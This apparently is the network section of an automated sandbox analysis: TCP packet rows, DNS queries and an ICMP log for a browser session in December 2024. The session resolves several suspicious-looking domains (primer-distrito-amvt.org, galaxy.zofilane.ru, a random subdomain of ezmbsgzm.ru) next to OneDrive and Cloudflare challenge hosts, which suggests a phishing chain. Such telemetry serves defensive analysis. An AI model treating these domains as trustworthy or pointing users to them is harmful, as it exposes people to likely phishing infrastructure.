                                                            Dec 14, 2024 10:11:11.370287895 CET44349833104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:11.370425940 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.370699883 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.370743990 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.370763063 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.370872021 CET44349833104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:11.370938063 CET49833443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.370987892 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.371072054 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:11.371160030 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.371349096 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:11.371375084 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:12.588331938 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:12.588638067 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:12.588701963 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:12.591658115 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:12.591814995 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:12.592000961 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:12.592092037 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:12.592330933 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:12.592349052 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:12.639255047 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:13.021486044 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:13.021528006 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:13.021739960 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:13.021850109 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:13.021867990 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:13.465838909 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:13.466047049 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:13.466109991 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:13.466788054 CET49839443192.168.2.4104.21.32.251
                                                            Dec 14, 2024 10:11:13.466805935 CET44349839104.21.32.251192.168.2.4
                                                            Dec 14, 2024 10:11:14.215688944 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:14.215826035 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:14.215899944 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:14.590223074 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:14.590758085 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:14.590821028 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:14.592933893 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:14.593120098 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:14.594069004 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:14.594176054 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:14.594203949 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:14.594230890 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:14.650322914 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:14.650383949 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:14.698461056 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:14.823683977 CET49813443192.168.2.4142.250.181.132
                                                            Dec 14, 2024 10:11:14.823748112 CET44349813142.250.181.132192.168.2.4
                                                            Dec 14, 2024 10:11:14.823942900 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:14.823971033 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:14.824119091 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:14.824280024 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:14.824297905 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:15.050230026 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:15.050311089 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:15.050482035 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:15.050545931 CET4434984213.107.137.11192.168.2.4
                                                            Dec 14, 2024 10:11:15.050972939 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:15.050972939 CET49842443192.168.2.413.107.137.11
                                                            Dec 14, 2024 10:11:16.039094925 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.042902946 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.042926073 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.046474934 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.046731949 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.047040939 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.047040939 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.047226906 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.099328995 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.099348068 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.146048069 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.499630928 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.499988079 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.500123024 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.500123024 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.500147104 CET4434984835.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.500567913 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.500653028 CET49848443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.500655890 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:16.500735044 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.501064062 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:16.501147032 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:17.716532946 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:17.716932058 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:17.716996908 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:17.718193054 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:17.718489885 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:17.718609095 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:17.718625069 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:17.718677044 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:17.772639036 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:18.176156998 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:18.176450014 CET49855443192.168.2.435.190.80.1
                                                            Dec 14, 2024 10:11:18.176485062 CET4434985535.190.80.1192.168.2.4
                                                            Dec 14, 2024 10:11:18.176529884 CET49855443192.168.2.435.190.80.1
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 14, 2024 10:09:59.086637020 CET53594581.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:09:59.091161966 CET53617951.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:01.913005114 CET53508271.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:02.756979942 CET5198653192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:02.757031918 CET5998653192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:02.894896030 CET53519861.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:02.896367073 CET53599861.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:04.737883091 CET6247753192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:04.738039017 CET6000253192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:04.876014948 CET53624771.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:05.074119091 CET53600021.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:08.367785931 CET6200153192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:08.367899895 CET6145353192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:09.084732056 CET53620011.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:09.084785938 CET53614531.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:11.471807003 CET5552553192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:11.471807003 CET5542653192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:11.920726061 CET53554261.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:11.921008110 CET53555251.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:14.249905109 CET138138192.168.2.4192.168.2.255
                                                            Dec 14, 2024 10:10:14.815306902 CET4971653192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:14.815521002 CET5619553192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:14.952197075 CET53497161.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:14.952903032 CET53561951.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:18.274967909 CET5059953192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:18.275083065 CET5628253192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:18.412307024 CET53562821.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:18.413356066 CET53505991.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:18.899395943 CET53511431.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:37.710024118 CET53634441.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:40.386159897 CET6046953192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:40.386159897 CET5119553192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:40.386710882 CET5042753192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:40.386712074 CET5291853192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:40.387151003 CET5332353192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:40.387151957 CET5742853192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:40.523422003 CET53511951.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:40.523704052 CET53604691.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:40.523799896 CET53529181.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:40.524194002 CET53533231.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:40.524466991 CET53504271.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:40.525170088 CET53574281.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:42.590367079 CET5025653192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:42.590614080 CET6362853192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:42.644695997 CET5150753192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:42.644893885 CET5479753192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:42.727689028 CET53502561.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:42.728039026 CET53636281.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:42.782223940 CET53515071.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:42.783538103 CET53547971.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:44.207240105 CET5755353192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:44.207290888 CET5632553192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:44.217971087 CET5585453192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:44.218177080 CET6501153192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:10:44.344731092 CET53575531.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:44.344875097 CET53563251.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:44.355504990 CET53558541.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:44.355716944 CET53650111.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:10:58.549530029 CET53533611.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:11:00.629029989 CET53634181.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:11:06.198940039 CET6260053192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:06.199223042 CET5503653192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:06.649305105 CET53626001.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:11:06.649430990 CET53550361.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:11:09.998963118 CET4975053192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:09.999104023 CET5661853192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:10.010020018 CET6010953192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:10.010117054 CET6534853192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:10.149234056 CET53653481.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:11:10.149755001 CET53601091.1.1.1192.168.2.4
                                                            Dec 14, 2024 10:11:12.343379021 CET5957553192.168.2.41.1.1.1
                                                            Dec 14, 2024 10:11:12.343497038 CET5621053192.168.2.41.1.1.1
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Dec 14, 2024 10:10:05.075942039 CET192.168.2.41.1.1.1c222(Port unreachable)Destination Unreachable
                                                            Dec 14, 2024 10:11:10.491817951 CET192.168.2.41.1.1.1c2d9(Port unreachable)Destination Unreachable
                                                            Dec 14, 2024 10:11:15.480285883 CET192.168.2.41.1.1.1c2bb(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 14, 2024 10:10:02.756979942 CET192.168.2.41.1.1.10x6b90Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:02.757031918 CET192.168.2.41.1.1.10xc972Standard query (0)www.google.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:04.737883091 CET192.168.2.41.1.1.10xf8f2Standard query (0)www.google.co.aoA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:04.738039017 CET192.168.2.41.1.1.10x8562Standard query (0)www.google.co.ao65IN (0x0001)false
                                                            Dec 14, 2024 10:10:08.367785931 CET192.168.2.41.1.1.10xdfe6Standard query (0)primer-distrito-amvt.orgA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:08.367899895 CET192.168.2.41.1.1.10x309dStandard query (0)primer-distrito-amvt.org65IN (0x0001)false
                                                            Dec 14, 2024 10:10:11.471807003 CET192.168.2.41.1.1.10x71b7Standard query (0)galaxy.zofilane.ruA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:11.471807003 CET192.168.2.41.1.1.10xdd52Standard query (0)galaxy.zofilane.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:10:14.815306902 CET192.168.2.41.1.1.10xc0e4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:14.815521002 CET192.168.2.41.1.1.10x2783Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:18.274967909 CET192.168.2.41.1.1.10xd1e4Standard query (0)galaxy.zofilane.ruA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:18.275083065 CET192.168.2.41.1.1.10x2d5aStandard query (0)galaxy.zofilane.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.386159897 CET192.168.2.41.1.1.10x3231Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.386159897 CET192.168.2.41.1.1.10x5f16Standard query (0)code.jquery.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.386710882 CET192.168.2.41.1.1.10xdecaStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.386712074 CET192.168.2.41.1.1.10x5929Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.387151003 CET192.168.2.41.1.1.10x20ccStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.387151957 CET192.168.2.41.1.1.10x4713Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.590367079 CET192.168.2.41.1.1.10xa729Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.590614080 CET192.168.2.41.1.1.10xb1b2Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.644695997 CET192.168.2.41.1.1.10xb6edStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.644893885 CET192.168.2.41.1.1.10x3cefStandard query (0)code.jquery.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.207240105 CET192.168.2.41.1.1.10x8249Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.207290888 CET192.168.2.41.1.1.10xa548Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.217971087 CET192.168.2.41.1.1.10x7841Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.218177080 CET192.168.2.41.1.1.10x926cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:11:06.198940039 CET192.168.2.41.1.1.10x5f1fStandard query (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:06.199223042 CET192.168.2.41.1.1.10xf11aStandard query (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:11:09.998963118 CET192.168.2.41.1.1.10x8003Standard query (0)www.onedrive.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:09.999104023 CET192.168.2.41.1.1.10xf86dStandard query (0)www.onedrive.com65IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.010020018 CET192.168.2.41.1.1.10x5880Standard query (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ruA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.010117054 CET192.168.2.41.1.1.10xf644Standard query (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:11:12.343379021 CET192.168.2.41.1.1.10xe813Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:12.343497038 CET192.168.2.41.1.1.10xfa2fStandard query (0)onedrive.live.com65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 14, 2024 10:10:02.894896030 CET1.1.1.1192.168.2.40x6b90No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:02.896367073 CET1.1.1.1192.168.2.40xc972No error (0)www.google.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:04.876014948 CET1.1.1.1192.168.2.40xf8f2No error (0)www.google.co.ao142.250.181.99A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:09.084732056 CET1.1.1.1192.168.2.40xdfe6No error (0)primer-distrito-amvt.org68.70.164.7A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:11.920726061 CET1.1.1.1192.168.2.40xdd52No error (0)galaxy.zofilane.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:10:11.921008110 CET1.1.1.1192.168.2.40x71b7No error (0)galaxy.zofilane.ru104.21.67.40A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:11.921008110 CET1.1.1.1192.168.2.40x71b7No error (0)galaxy.zofilane.ru172.67.211.247A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:14.952197075 CET1.1.1.1192.168.2.40xc0e4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:18.412307024 CET1.1.1.1192.168.2.40x2d5aNo error (0)galaxy.zofilane.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:10:18.413356066 CET1.1.1.1192.168.2.40xd1e4No error (0)galaxy.zofilane.ru172.67.211.247A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:18.413356066 CET1.1.1.1192.168.2.40xd1e4No error (0)galaxy.zofilane.ru104.21.67.40A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.523704052 CET1.1.1.1192.168.2.40x3231No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.523704052 CET1.1.1.1192.168.2.40x3231No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.523704052 CET1.1.1.1192.168.2.40x3231No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.523704052 CET1.1.1.1192.168.2.40x3231No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.523799896 CET1.1.1.1192.168.2.40x5929No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.524194002 CET1.1.1.1192.168.2.40x20ccNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.524194002 CET1.1.1.1192.168.2.40x20ccNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.524466991 CET1.1.1.1192.168.2.40xdecaNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.524466991 CET1.1.1.1192.168.2.40xdecaNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:40.525170088 CET1.1.1.1192.168.2.40x4713No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.727689028 CET1.1.1.1192.168.2.40xa729No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.727689028 CET1.1.1.1192.168.2.40xa729No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.728039026 CET1.1.1.1192.168.2.40xb1b2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.782223940 CET1.1.1.1192.168.2.40xb6edNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.782223940 CET1.1.1.1192.168.2.40xb6edNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.782223940 CET1.1.1.1192.168.2.40xb6edNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:42.782223940 CET1.1.1.1192.168.2.40xb6edNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.344731092 CET1.1.1.1192.168.2.40x8249No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.344731092 CET1.1.1.1192.168.2.40x8249No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.344875097 CET1.1.1.1192.168.2.40xa548No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.355504990 CET1.1.1.1192.168.2.40x7841No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.355504990 CET1.1.1.1192.168.2.40x7841No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:10:44.355716944 CET1.1.1.1192.168.2.40x926cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Dec 14, 2024 10:11:06.649305105 CET1.1.1.1192.168.2.40x5f1fNo error (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:06.649305105 CET1.1.1.1192.168.2.40x5f1fNo error (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:06.649430990 CET1.1.1.1192.168.2.40xf11aNo error (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.136284113 CET1.1.1.1192.168.2.40x8003No error (0)www.onedrive.comodwebp.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.136284113 CET1.1.1.1192.168.2.40x8003No error (0)odsp-odweb-webfe-lb.eurwesteur001307.odsp-odweb-webfe.westeurope-prod.cosmic.office.netcosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.149234056 CET1.1.1.1192.168.2.40xf644No error (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru65IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.149755001 CET1.1.1.1192.168.2.40x5880No error (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru104.21.32.251A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.149755001 CET1.1.1.1192.168.2.40x5880No error (0)3ydulqnlbft8ruhm0anse8sicehpnxyxlclupdvkh8h7lsonkse7m.ezmbsgzm.ru172.67.139.11A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.491719007 CET1.1.1.1192.168.2.40xf86dNo error (0)www.onedrive.comodwebp.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:10.491719007 CET1.1.1.1192.168.2.40xf86dNo error (0)odsp-odweb-webfe-lb.eurwesteur001307.odsp-odweb-webfe.westeurope-prod.cosmic.office.netcosmic-westeurope-ns-cbf6e4cb41a8.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:12.481806040 CET1.1.1.1192.168.2.40xfa2fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:12.481806040 CET1.1.1.1192.168.2.40xfa2fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:13.020704031 CET1.1.1.1192.168.2.40xe813No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:13.020704031 CET1.1.1.1192.168.2.40xe813No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:13.020704031 CET1.1.1.1192.168.2.40xe813No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 14, 2024 10:11:13.020704031 CET1.1.1.1192.168.2.40xe813No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                            Dec 14, 2024 10:11:13.020704031 CET1.1.1.1192.168.2.40xe813No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                            • www.google.co.ao
                                                            • primer-distrito-amvt.org
                                                              • galaxy.zofilane.ru
                                                            • https:
                                                              • code.jquery.com
                                                              • cdnjs.cloudflare.com
                                                              • challenges.cloudflare.com
